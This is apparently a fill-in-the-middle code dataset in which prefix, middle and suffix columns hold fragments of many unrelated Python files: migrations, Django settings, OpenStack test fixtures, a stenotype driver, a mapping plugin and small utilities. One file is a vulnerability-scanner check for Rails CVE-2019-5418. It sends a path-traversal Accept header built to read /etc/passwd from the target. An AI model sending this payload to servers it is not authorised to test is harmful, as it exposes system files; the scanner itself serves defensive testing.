prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
"""add unique key to username Revision ID: c19852e4dcda Revises: 1478867a872a Create Date: 2020-08-06 00:39:03.004053 """ from alembic import op import sqlalchemy as sa # revision identifiers, used by Alembic. revision = 'c19852e4dcda' down_revision = '1478867a872a' branch_labels = None depends_on = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('use
r', schema=None) as batch_op: batch_op.drop_index('ix_user_username') batch_op.create_index(batch_op.f('ix_user_username'), ['username'], unique=True) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### with op.batch_alter_table('user', schema=None) as batch_op: batch_op.drop_index(batch_op.f('ix_user_username')) batch_op.create_index('ix_user_username', ['username'], un
ique=False) # ### end Alembic commands ###
#!/bin/env python
# Copyright 2013 Zynga Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
This module maps request to function based on the url and method
"""
import re
import os
import cgi
import urlrelay
from cgi import parse_qs
from diskmapper import DiskMapper


@urlrelay.url('^.*$', 'GET')
def index(environ, start_response):
    """Handle GET requests.

    Dispatches on the ``action`` query parameter to the matching
    DiskMapper lookup; anything else is forwarded unchanged.
    """
    # Default to "" — environ may not contain QUERY_STRING at all, and
    # parse_qs(None) raises a TypeError.
    query_string = parse_qs(environ.get("QUERY_STRING", ""))
    dm = DiskMapper(environ, start_response)
    if "action" in query_string:
        action = query_string["action"]
        if "get_host_config" in action:
            return dm.get_host_config()
        elif "get_all_config" in action:
            return dm.get_all_config()
        elif "get_vb_mapping" in action:
            # Optional 'vbucket' parameter narrows the mapping to one vbucket.
            key = None
            if "vbucket" in query_string:
                key = query_string["vbucket"][0]
            return dm.get_vbuckets("vbucket", key)
        elif "get_ss_mapping" in action:
            # Optional 'storage_server' parameter narrows to one server.
            key = None
            if "storage_server" in query_string:
                key = query_string["storage_server"][0]
            return dm.get_vbuckets("storage_server", key)
    return dm.forward_request()


@urlrelay.url('^.*$', 'DELETE')
def delete(environ, start_response):
    """Handle DELETE requests by forwarding them unchanged."""
    dm = DiskMapper(environ, start_response)
    return dm.forward_request()


@urlrelay.url('^.*$', 'POST')
def upload(environ, start_response):
    """Handle POST requests by streaming the body to the disk mapper."""
    dm = DiskMapper(environ, start_response)
    return dm.upload()
""" Django settings for mysite project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'at0zvwnp1y=4sva38l)0)ejiaiq$aqap8ehs7uld0g948yj-fy' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS =
[] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'polls', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddlewar
e', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'mysite.urls' WSGI_APPLICATION = 'mysite.wsgi.application' # Database # https://docs.djangoproject.com/en/1.7/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Internationalization # https://docs.djangoproject.com/en/1.7/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Asia/Tokyo' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.7/howto/static-files/ STATIC_URL = '/static/' # Template files TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo_config import cfg
from oslo_config import fixture as config_fixture

from nova import config
from nova import ipv6
from nova import paths
from nova.tests.unit import utils

CONF = cfg.CONF
# Import option definitions from the modules that register them so the
# fixture below can override their defaults before any test reads them.
CONF.import_opt('use_ipv6', 'nova.netconf')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('scheduler_driver', 'nova.scheduler.manager')
CONF.import_opt('fake_network', 'nova.network.linux_net')
CONF.import_opt('network_size', 'nova.network.manager')
CONF.import_opt('num_networks', 'nova.network.manager')
CONF.import_opt('floating_ip_dns_manager', 'nova.network.floating_ips')
CONF.import_opt('instance_dns_manager', 'nova.network.floating_ips')
CONF.import_opt('policy_file', 'nova.openstack.common.policy')
CONF.import_opt('compute_driver', 'nova.virt.driver')
CONF.import_opt('api_paste_config', 'nova.wsgi')


class ConfFixture(config_fixture.Config):
    """Fixture to manage global conf settings."""

    def setUp(self):
        super(ConfFixture, self).setUp()
        # Fake host/driver/network values so tests never touch real
        # infrastructure or external services.
        self.conf.set_default('api_paste_config',
                              paths.state_path_def('etc/nova/api-paste.ini'))
        self.conf.set_default('host', 'fake-mini')
        self.conf.set_default('compute_driver',
                              'nova.virt.fake.SmallFakeDriver')
        self.conf.set_default('fake_network', True)
        self.conf.set_default('flat_network_bridge', 'br100')
        self.conf.set_default('floating_ip_dns_manager',
                              'nova.tests.unit.utils.dns_manager')
        self.conf.set_default('instance_dns_manager',
                              'nova.tests.unit.utils.dns_manager')
        # Small network sizes keep network-manager tests fast.
        self.conf.set_default('network_size', 8)
        self.conf.set_default('num_networks', 2)
        self.conf.set_default('use_ipv6', True)
        self.conf.set_default('vlan_interface', 'eth0')
        self.conf.set_default('auth_strategy', 'noauth')
        # Parse an empty arg list so CONF is fully initialized with no
        # external config files picked up from the environment.
        config.parse_args([], default_config_files=[])
        # In-memory SQLite keeps the DB layer self-contained per test run.
        self.conf.set_default('connection', "sqlite://", group='database')
        self.conf.set_default('sqlite_synchronous', False, group='database')
        self.conf.set_default('fatal_exception_format_errors', True)
        self.conf.set_default('enabled', True, 'osapi_v3')
        self.conf.set_default('force_dhcp_release', False)
        self.conf.set_default('periodic_enable', False)
        # Undo module-level state touched by tests when the fixture is torn down.
        self.addCleanup(utils.cleanup_dns_managers)
        self.addCleanup(ipv6.api.reset_backend)
ight (c) 2010-2011 Joshua Harlan Lifton. # See LICENSE.txt for details. # TODO: add tests for all machines # TODO: add tests for new status callbacks """Base classes for machine types. Do not use directly.""" import binascii import threading import serial from plover import _, log from plover.machine.keymap import Keymap from plover.misc import boolean # i18n: Machine state. STATE_STOPPED = _('stopped') # i18n: Machine state. STATE_INITIALIZING = _('initializing') # i18n: Machine state. STATE_RUNNING = _('connected') # i18n: Machine state. STATE_ERROR = _('disconnected') class StenotypeBase: """The base class for all Stenotype classes.""" # Layout of physical keys. KEYS_LAYOUT = '' # And special actions to map to. ACTIONS = () # Fallback to use as machine type for finding a compatible keymap # if one is not already available for this machine type. KEYMAP_MACHINE_TYPE = None def __init__(self): # Setup default keymap with no translation of keys. keys = self.get_keys() self.keymap = Keymap(keys, keys) self.keymap.set_mappings(zip(keys, keys)) self.stroke_subscribers = [] self.state_subscribers = [] self.state = STATE_STOPPED def set_keymap(self, keymap): """Setup machine keymap.""" self.keymap = keymap def start_capture(self): """Begin listening for output from the stenotype machine.""" pass def stop_capture(self): """Stop listening for output from the stenotype machine.""" pass def add_stroke_callback(self, callback): """Subscribe to output from the stenotype machine. Argument: callback -- The function to call whenever there is output from the stenotype machine and output is being captured. """ self.stroke_subscribers.append(callback) def remove_stroke_callback(self, callback): """Unsubscribe from output from the stenotype machine. Argument: callback -- A function that was previously subscribed. 
""" self.stroke_subscribers.remove(callback) def add_state_callback(self, callback): self.state_subscribers.append(callback) def remove_state_callback(self, callback): self.state_subscribers.remove(callback) def _notify(self, steno_keys): """Invoke the callback of each subscriber with the given argument.""" for callback in self.stroke_subscribers: callback(steno_keys) def set_suppression(self, enabled): '''Enable keyboard suppression. This is only of use for the keyboard machine, to suppress the keyboard when then engine is running. ''' pass def suppress_last_stroke(self, send_backspaces): '''Suppress the last stroke key events after the fact. This is only of use for the keyboard machine, and the engine is resumed with a command stroke. Argument: send_backspaces -- The function to use to send backspaces. ''' pass def _set_state(self, state): self.state = state for callback in self.state_subscribers: callback(state) def _stopped(self): self._set_state(STATE_STOPPED) def _initializing(self): self._set_state(STATE_INITIALIZING) def _ready(self): self._set_state(STATE_RUNNING) def _error(self): self._set_state(STATE_ERROR) @classmethod def get_actions(cls): """List of supported actions to map to.""" return cls.ACTIONS @classmethod def get_keys(cls): return tuple(cls.KEYS_LAYOUT.split()) @classmethod def get_option_info(cls): """Get the default options for this machine.""" return {} class ThreadedStenotypeBase(StenotypeBase, threading.Thread): """Base class for thread based machines. Subclasses should override run. 
""" def __init__(self): threading.Thread.__init__(self) self.name += '-machine' StenotypeBase.__init__(self) self.finished = threading.Event() def run(self): """This method should be overridden by a subclass.""" pass def start_capture(self): """Begin listening for output from the stenotype machine.""" self.finished.clear() self._initializing() self.start() def stop_capture(self): """Stop listening for output from the stenotype machine.""" self.finished.set() try: self.join() except RuntimeError: pass self._stopped() class SerialStenotypeBase(ThreadedStenotypeBase): """For use with stenotype machines that connect via serial port. This class implements the three methods necessary for a standard stenotype interface: start_capture, stop_capture, and add_callback. """ # Default seria
l parameters. SERIAL_PARAMS = { 'port': None, 'baudrate': 9600, 'bytesize': 8, 'parity': 'N', 'stopbits': 1, 'timeout': 2.0, } def __init__(self, serial_params): """Monitor the stenotype over a serial port. The key-value pairs in the <serial_params> dict are the same
as the keyword arguments for a serial.Serial object. """ ThreadedStenotypeBase.__init__(self) self.serial_port = None self.serial_params = serial_params def _close_port(self): if self.serial_port is None: return self.serial_port.close() self.serial_port = None def start_capture(self): self._close_port() try: self.serial_port = serial.Serial(**self.serial_params) except (serial.SerialException, OSError): log.warning('Can\'t open serial port', exc_info=True) self._error() return if not self.serial_port.isOpen(): log.warning('Serial port is not open: %s', self.serial_params.get('port')) self._error() return return ThreadedStenotypeBase.start_capture(self) def stop_capture(self): """Stop listening for output from the stenotype machine.""" ThreadedStenotypeBase.stop_capture(self) self._close_port() @classmethod def get_option_info(cls): """Get the default options for this machine.""" sb = lambda s: int(float(s)) if float(s).is_integer() else float(s) converters = { 'port': str, 'baudrate': int, 'bytesize': int, 'parity': str, 'stopbits': sb, 'timeout': float, 'xonxoff': boolean, 'rtscts': boolean, } return { setting: (default, converters[setting]) for setting, default in cls.SERIAL_PARAMS.items() } def _iter_packets(self, packet_size): """Yield packets of <packets_size> bytes until the machine is stopped. 
N.B.: to workaround the fact that the Toshiba Bluetooth stack on Windows does not correctly handle the read timeout setting (returning immediately if some data is already available): - the effective timeout is re-configured to <timeout/packet_size> - multiple reads are done (until a packet is complete) - an incomplete packet will only be discarded if one of those reads return no data (but not on short read) """ self.serial_port.timeout = max( self.serial_params.get('timeout', 1.0) / packet_size, 0.01, ) packet = b'' while not self.finished.is_set(): raw = self.serial_port.read(packet_size - len(packet)) if not raw: if packet: log.error('discarding incomplete packet: %s', binascii.hexlify(packet)) packet = b'' continue packet += raw if len(packet) != packet_size: continue yield packet pa
# -*- coding: utf-8 -*-

from folium.plugins.marker_cluster import MarkerCluster
from folium.utilities import if_pandas_df_convert_to_numpy, validate_location

from jinja2 import Template


class FastMarkerCluster(MarkerCluster):
    """
    Add marker clusters to a map using in-browser rendering.

    Using FastMarkerCluster it is possible to render 000's of
    points far quicker than the MarkerCluster class.

    Be aware that the FastMarkerCluster class passes an empty
    list to the parent class' __init__ method during initialisation.
    This means that the add_child method is never called, and
    no reference to any marker data are retained. Methods such
    as get_bounds() are therefore not available when using it.

    Parameters
    ----------
    data: list of list with values
        List of list of shape [[lat, lon], [lat, lon], etc.]
        When you use a custom callback you could add more values after the
        lat and lon. E.g. [[lat, lon, 'red'], [lat, lon, 'blue']]
    callback: string, optional
        A string representation of a valid Javascript function
        that will be passed each row in data. See the
        FasterMarkerCluster for an example of a custom callback.
    name : string, optional
        The name of the Layer, as it will appear in LayerControls.
    overlay : bool, default True
        Adds the layer as an optional overlay (True) or the base layer (False).
    control : bool, default True
        Whether the Layer will be included in LayerControls.
    show: bool, default True
        Whether the layer will be shown on opening (only for overlays).
    icon_create_function : string, default None
        Override the default behaviour, making possible to customize
        markers colors and sizes.
    **kwargs
        Additional arguments are passed to Leaflet.markercluster options.
        See https://github.com/Leaflet/Leaflet.markercluster
    """
    # JS emitted into the page: runs the per-row callback to build each
    # marker, then adds the cluster group to the parent map.
    _template = Template(u"""
        {% macro script(this, kwargs) %}
            var {{ this.get_name() }} = (function(){
                {{ this.callback }}

                var data = {{ this.data|tojson }};
                var cluster = L.markerClusterGroup({{ this.options|tojson }});
                {%- if this.icon_create_function is not none %}
                cluster.options.iconCreateFunction =
                    {{ this.icon_create_function.strip() }};
                {%- endif %}

                for (var i = 0; i < data.length; i++) {
                    var row = data[i];
                    var marker = callback(row);
                    marker.addTo(cluster);
                }

                cluster.addTo({{ this._parent.get_name() }});
                return cluster;
            })();
        {% endmacro %}""")

    def __init__(self, data, callback=None, options=None,
                 name=None, overlay=True, control=True, show=True,
                 icon_create_function=None, **kwargs):
        if options is not None:
            kwargs.update(options)  # options argument is legacy
        super(FastMarkerCluster, self).__init__(name=name, overlay=overlay,
                                                control=control, show=show,
                                                icon_create_function=icon_create_function,
                                                **kwargs)
        self._name = 'FastMarkerCluster'
        # Accept pandas DataFrames as well as plain sequences of rows.
        data = if_pandas_df_convert_to_numpy(data)
        # Validate the lat/lon pair; keep any extra per-row values so the
        # JS callback can use them (e.g. a colour in row[2]).
        self.data = [[*validate_location(row[:2]), *row[2:]]  # noqa: E999
                     for row in data]

        if callback is None:
            # Default JS callback: plain marker with the default Awesome icon.
            self.callback = """
                var callback = function (row) {
                    var icon = L.AwesomeMarkers.icon();
                    var marker = L.marker(new L.LatLng(row[0], row[1]));
                    marker.setIcon(icon);
                    return marker;
                };"""
        else:
            self.callback = 'var callback = {};'.format(callback)
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 01 10:45:09 2014
Training models remotely in cloud
@author: pacif_000
"""
from kafka.client import KafkaClient
from kafka.consumer import SimpleConsumer
import os
import platform
if platform.system() == 'Windows':
    import win32api
else:
    import signal
import thread
import traceback

kafkaHost = 'monkkafka.cloudapp.net:9092,monkkafka.cloudapp.net:9093,monkkafka.cloudapp.net:9094'
kafkaTopic = 'expr'
kafkaGroup = 'expr'
kafka = None
producer = None
consumer = None


def onexit(*_args):
    """Commit offsets and shut down the Kafka consumer/producer/client.

    Accepts (and ignores) positional arguments so it can be registered
    directly with signal.signal(), which invokes handlers as
    handler(signum, frame). The previous zero-argument version raised
    TypeError when SIGINT actually fired.
    """
    global kafka, consumer, producer
    if consumer:
        # Persist consumed offsets before stopping so work is not re-done.
        consumer.commit()
        consumer.stop()
        consumer = None
    if producer:
        producer.stop()
        producer = None
    if kafka:
        kafka.close()
        kafka = None
    print('remote_rainter {0} is shutting down'.format(os.getpid()))


def handler(sig, hook=thread.interrupt_main):
    """Windows console control handler: clean up like onexit(), then exit.

    Signature (sig, hook) kept for SetConsoleCtrlHandler compatibility.
    Previously duplicated the whole onexit() body; now delegates to it.
    """
    onexit()
    exit(1)


def server():
    """Connect to Kafka and consume messages until interrupted."""
    global kafka, producer, consumer
    if platform.system() == 'Windows':
        win32api.SetConsoleCtrlHandler(handler, 1)
    else:
        signal.signal(signal.SIGINT, onexit)
    try:
        kafka = KafkaClient(kafkaHost, timeout=None)
        consumer = SimpleConsumer(kafka, kafkaGroup, kafkaTopic,
                                  partitions=[0, 1, 2])
        for message in consumer:
            print(message)
    except Exception as e:
        print('Exception {0}'.format(e))
        print('Can not consume actions')
        print(traceback.format_exc())
    except KeyboardInterrupt:
        onexit()
    finally:
        onexit()


if __name__ == '__main__':
    # Reconnect forever: server() returns after any error/shutdown.
    while 1:
        server()
# Copyright (c) 2013 - 2020 Adam Caudill and Contributors.
# This file is part of YAWAST which is released under the MIT license.
# See the LICENSE file or go to https://yawast.org/license/ for full license details.

import re
from typing import List

from yawast.reporting.enums import Vulnerabilities
from yawast.scanner.plugins.result import Result
from yawast.shared import network, output

# URLs already probed during this scan; prevents duplicate requests/findings.
_checked: List[str] = []


def reset():
    """Clear the per-scan cache of already-checked URLs."""
    global _checked

    _checked = []


def check_cve_2019_5418(url: str) -> List[Result]:
    """Probe *url* for Rails CVE-2019-5418 (file content disclosure).

    Sends a GET with a path-traversal Accept header; a vulnerable Rails
    controller renders /etc/passwd into the response body. Returns a list
    with one Result on a hit, otherwise an empty list.
    """
    global _checked

    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/") or url in _checked:
        return []

    results: List[Result] = []
    _checked.append(url)

    try:
        # Traversal payload with glob characters ('e*c/p*sswd') to evade
        # naive filters; '{{' terminates the Rails template lookup.
        res = network.http_get(
            url, False, {"Accept": "../../../../../../../../../e*c/p*sswd{{"}
        )

        if network.response_body_is_text(res):
            body = res.text
            req = network.http_build_raw_request(res.request)

            # check to see if "root" is in the string, then do the proper check
            if "root:" in body:
                # Match a real passwd entry for root (uid 0 / gid 0) rather
                # than any page that merely mentions "root:".
                pattern = r"root:[a-zA-Z0-9]+:0:0:.+$"
                mtch = re.search(pattern, body)

                if mtch:
                    results.append(
                        Result(
                            f"Rails CVE-2019-5418: File Content Disclosure: {url} - {mtch.group(0)}",
                            Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                            url,
                            [body, req],
                        )
                    )
    except Exception:
        # Network errors are non-fatal for a scanner; log and move on.
        output.debug_exception()

    return results
# Houses are arranged in a circle, so the first and last house are adjacent:
# consider the two cases (first house available / first house excluded) separately.
class Solution:
    """LeetCode 213, House Robber II: maximize loot from houses in a circle."""

    def rob(self, nums):
        """Return the maximum sum of non-adjacent elements, treating
        nums as circular (first and last are adjacent).

        :type nums: List[int]
        :rtype: int
        """
        if not nums:
            return 0
        # With one or two houses no adjacency conflict is possible.
        if len(nums) <= 2:
            return max(nums)
        # The first and last house cannot both be robbed, so the answer is
        # the better of the two linear sub-problems that exclude one end.
        return max(self._rob_line(nums[:-1]), self._rob_line(nums[1:]))

    @staticmethod
    def _rob_line(houses):
        """Classic linear house-robber DP in O(n) time, O(1) space."""
        take, skip = 0, 0  # best totals if we take / skip the current house
        for value in houses:
            take, skip = skip + value, max(take, skip)
        return max(take, skip)
import unittest

from mock import Mock

from cartodb_services.tomtom.isolines import TomTomIsolines, DEFAULT_PROFILE
from cartodb_services.tools import Coordinate
from credentials import tomtom_api_key

# Origin point for all isoline requests — presumably (lon, lat) for a spot
# in Manhattan; confirm against the Coordinate constructor's argument order.
VALID_ORIGIN = Coordinate(-73.989, 40.733)


class TomTomIsolinesTestCase(unittest.TestCase):
    """Integration-style tests: these hit the real TomTom service using the
    API key supplied by the credentials module."""

    def setUp(self):
        self.tomtom_isolines = TomTomIsolines(apikey=tomtom_api_key(),
                                              logger=Mock())

    def test_calculate_isochrone(self):
        # Two time contours: 5 and 15 minutes (values in seconds).
        time_ranges = [300, 900]
        solution = self.tomtom_isolines.calculate_isochrone(
            origin=VALID_ORIGIN,
            profile=DEFAULT_PROFILE,
            time_ranges=time_ranges)
        # Only asserts a non-empty result; exact geometry varies per request.
        assert solution

    def test_calculate_isodistance(self):
        # Single distance contour of 10 km (value presumably in meters).
        distance_range = 10000
        solution = self.tomtom_isolines.calculate_isodistance(
            origin=VALID_ORIGIN,
            profile=DEFAULT_PROFILE,
            distance_range=distance_range)
        assert solution
# -*- coding: utf-8 -*-


class Ledger(object):
    """Token-balance bookkeeping on top of a DB-API connection.

    Current balances live in the ``balances`` table; every deposit and
    withdrawal is additionally journaled in ``movements``.
    """

    def __init__(self, db):
        self.db = db

    def balance(self, token):
        """Return the current balance for *token*; 0 for unknown tokens."""
        cur = self.db.cursor()
        cur.execute("""SELECT * FROM balances WHERE TOKEN = %s""", [token])
        row = cur.fetchone()
        if row is None:
            return 0
        # assumes the amount is the third column of balances — TODO confirm schema
        return row[2]

    def deposit(self, token, amount):
        """Credit *amount* to *token*, creating its balance row on first use."""
        cur = self.db.cursor()
        # Create the balance row if this token has never been seen.
        cur.execute(
            """INSERT INTO balances (token, amount) SELECT %s, 0 WHERE NOT EXISTS (SELECT 1 FROM balances WHERE token = %s)""",
            [token, token])
        # Credit the balance, then journal the movement.
        cur.execute(
            """UPDATE balances SET amount = amount + %s WHERE token = %s""",
            [amount, token])
        cur.execute(
            """INSERT INTO movements (token, amount) VALUES(%s, %s)""",
            [token, amount])
        self.db.commit()
        return True

    def withdraw(self, token, amount):
        """Remove the given amount from the token's balance."""
        cur = self.db.cursor()
        # Guarded update: debits only when the balance covers the amount,
        # so overdrafts are rejected atomically by the database.
        cur.execute("""
            UPDATE balances SET amount = amount - %s WHERE token = %s AND amount >= %s""",
            [amount, token, amount])
        if cur.rowcount != 1:
            return False
        cur.execute(
            """INSERT INTO movements (token, amount) VALUES(%s, %s)""",
            [token, -amount])
        self.db.commit()
        return True
#!/usr/bin/python
#
#
from distutils.core import setup
from spacewalk.common.rhnConfig import CFG, initCFG

# Load the 'web' section of the Spacewalk config so CFG.PRODUCT_NAME is
# populated before it is used in the metadata below.
initCFG('web')

setup(name = "rhnclient",
      version = "5.5.9",
      description = CFG.PRODUCT_NAME + " Client Utilities and Libraries",
      long_description = CFG.PRODUCT_NAME + """\
 Client Utilities
    Includes: rhn_check, action handler, and modules to allow
    client packages to communicate with RHN.""",
      author = 'Joel Martin',
      author_email = 'jmartin@redhat.com',
      url = 'http://rhn.redhat.com',
      packages = ["rhn.actions", "rhn.client"],
      license = "GPL",
      )
# Copyright (c) 2019 Ultimaker B.V.
# Cura is released under the terms of the LGPLv3 or higher.

from . import BedLevelMachineAction
from . import UMOUpgradeSelection


def getMetaData():
    # No plugin-level metadata; the machine actions register themselves
    # via register() below.
    return {}


def register(app):
    # Expose this plugin's machine actions (bed leveling and UMO upgrade
    # selection) to the Cura application.
    return {
        "machine_action": [
            BedLevelMachineAction.BedLevelMachineAction(),
            UMOUpgradeSelection.UMOUpgradeSelection()
        ]}
import _plotly_utils.basevalidators


class WidthValidator(_plotly_utils.basevalidators.NumberValidator):
    """Number validator for the ``scatter.line.width`` property."""

    def __init__(self, plotly_name="width", parent_name="scatter.line", **kwargs):
        # Defaults applied only when the caller has not supplied a value;
        # equivalent to popping each key with a fallback.
        defaults = {
            "anim": True,
            "edit_type": "style",
            "min": 0,
            "role": "style",
        }
        for option, value in defaults.items():
            kwargs.setdefault(option, value)
        super(WidthValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
# Print an ASCII figure of size n x n: a full horizontal and vertical
# centre line plus four corner "hooks". Same output as the original
# char-by-char version, but each row is assembled first and printed once.
n = int(input('Enter any number: '))
# Odd sizes are rounded up to the next even number.
if n % 2 != 0:
    n = n + 1
mid = int(n / 2)
for i in range(n):
    row = []
    for j in range(n):
        on_centre = (i == mid) or (j == mid)
        on_hooks = ((i == 0 and j >= mid)
                    or (j == 0 and i <= mid)
                    or (j == n - 1 and i >= mid)
                    or (i == n - 1 and j <= mid))
        row.append('*' if (on_centre or on_hooks) else ' ')
    print(''.join(row))
from PyQt4.QtCore import QSize
from PyQt4.QtGui import QVBoxLayout


# This is really really ugly, but the QDockWidget for some reason does not notice when
# its child widget becomes smaller...
# Therefore we manually set its minimum size when our own minimum size changes
class MyVBoxLayout(QVBoxLayout):

    def __init__(self, parent=None):
        QVBoxLayout.__init__(self, parent)
        # Last minimum size we propagated, so we only update on real changes.
        self._last_size = QSize(0, 0)

    def setGeometry(self, r):
        # Let Qt lay out the children first, then push our minimum size up
        # to the dock widget.
        QVBoxLayout.setGeometry(self, r)
        try:
            # parentWidget() is the dock's content widget; its parent is
            # presumably the QDockWidget itself — relies on that hierarchy.
            wid = self.parentWidget().parentWidget()
            new_size = self.minimumSize()
            if new_size == self._last_size:
                return
            self._last_size = new_size
            # Add the title bar height (custom title bar widget if set).
            twid = wid.titleBarWidget()
            if twid is not None:
                theight = twid.sizeHint().height()
            else:
                theight = 0
            new_size += QSize(0, theight)
            wid.setMinimumSize(new_size)
        except Exception:
            # Best-effort: the widget hierarchy may not exist yet during
            # construction, in which case we silently skip the update.
            pass
# Copyright (c) 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import copy
from datetime import datetime
import time

from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from webob import exc

from neutron.api.v2 import attributes
from neutron.common import constants
from neutron import context
from neutron.db import agents_db
from neutron.db import db_base_plugin_v2
from neutron.extensions import agent
from neutron.tests.common import helpers
from neutron.tests import tools
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.db import test_db_base_plugin_v2

LOG = logging.getLogger(__name__)

_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path

# Host names used to register the fake agents below; note L3_HOSTA,
# DHCP_HOSTA and LBAAS_HOSTA deliberately share the same host.
L3_HOSTA = 'hosta'
DHCP_HOSTA = 'hosta'
L3_HOSTB = 'hostb'
DHCP_HOSTC = 'hostc'
LBAAS_HOSTA = 'hosta'
LBAAS_HOSTB = 'hostb'


class AgentTestExtensionManager(object):

    def get_resources(self):
        # Add the resources to the global attribute map
        # This is done here as the setup process won't
        # initialize the main API router which extends
        # the global attribute map
        attributes.RESOURCE_ATTRIBUTE_MAP.update(
            agent.RESOURCE_ATTRIBUTE_MAP)
        return agent.Agent.get_resources()

    def get_actions(self):
        return []

    def get_request_extensions(self):
        return []


# This plugin class is just for testing
class TestAgentPlugin(db_base_plugin_v2.NeutronDbPluginV2,
                      agents_db.AgentDbMixin):
    supported_extension_aliases = ["agent"]


class AgentDBTestMixIn(object):
    """Helpers shared by agent-extension test cases."""

    def _list_agents(self, expected_res_status=None,
                     neutron_context=None,
                     query_string=None):
        # List agents via the API; optionally assert on the HTTP status.
        agent_res = self._list('agents',
                               neutron_context=neutron_context,
                               query_params=query_string)
        if expected_res_status:
            self.assertEqual(agent_res.status_int, expected_res_status)
        return agent_res

    def _register_agent_states(self, lbaas_agents=False):
        """Register two L3 agents and two DHCP agents."""
        l3_hosta = helpers._get_l3_agent_dict(
            L3_HOSTA, constants.L3_AGENT_MODE_LEGACY)
        l3_hostb = helpers._get_l3_agent_dict(
            L3_HOSTB, constants.L3_AGENT_MODE_LEGACY)
        dhcp_hosta = helpers._get_dhcp_agent_dict(DHCP_HOSTA)
        dhcp_hostc = helpers._get_dhcp_agent_dict(DHCP_HOSTC)
        helpers.register_l3_agent(host=L3_HOSTA)
        helpers.register_l3_agent(host=L3_HOSTB)
        helpers.register_dhcp_agent(host=DHCP_HOSTA)
        helpers.register_dhcp_agent(host=DHCP_HOSTC)
        res = [l3_hosta, l3_hostb, dhcp_hosta, dhcp_hostc]
        if lbaas_agents:
            # LBaaS agents have no helper, so report their state through
            # the agents RPC callback directly.
            lbaas_hosta = {
                'binary': 'neutron-loadbalancer-agent',
                'host': LBAAS_HOSTA,
                'topic': 'LOADBALANCER_AGENT',
                'configurations': {'device_drivers': ['haproxy_ns']},
                'agent_type': constants.AGENT_TYPE_LOADBALANCER}
            lbaas_hostb = copy.deepcopy(lbaas_hosta)
            lbaas_hostb['host'] = LBAAS_HOSTB
            callback = agents_db.AgentExtRpcCallback()
            callback.report_state(
                self.adminContext,
                agent_state={'agent_state': lbaas_hosta},
                time=datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT))
            callback.report_state(
                self.adminContext,
                agent_state={'agent_state': lbaas_hostb},
                time=datetime.utcnow().strftime(constants.ISO8601_TIME_FORMAT))
            res += [lbaas_hosta, lbaas_hostb]
        return res

    def _register_dvr_agents(self):
        # One dvr_snat agent and one dvr agent, on different hosts.
        dvr_snat_agent = helpers.register_l3_agent(
            host=L3_HOSTA, agent_mode=constants.L3_AGENT_MODE_DVR_SNAT)
        dvr_agent = helpers.register_l3_agent(
            host=L3_HOSTB, agent_mode=constants.L3_AGENT_MODE_DVR)
        return [dvr_snat_agent, dvr_agent]


class AgentDBTestCase(AgentDBTestMixIn,
                      test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
    fmt = 'json'

    def setUp(self):
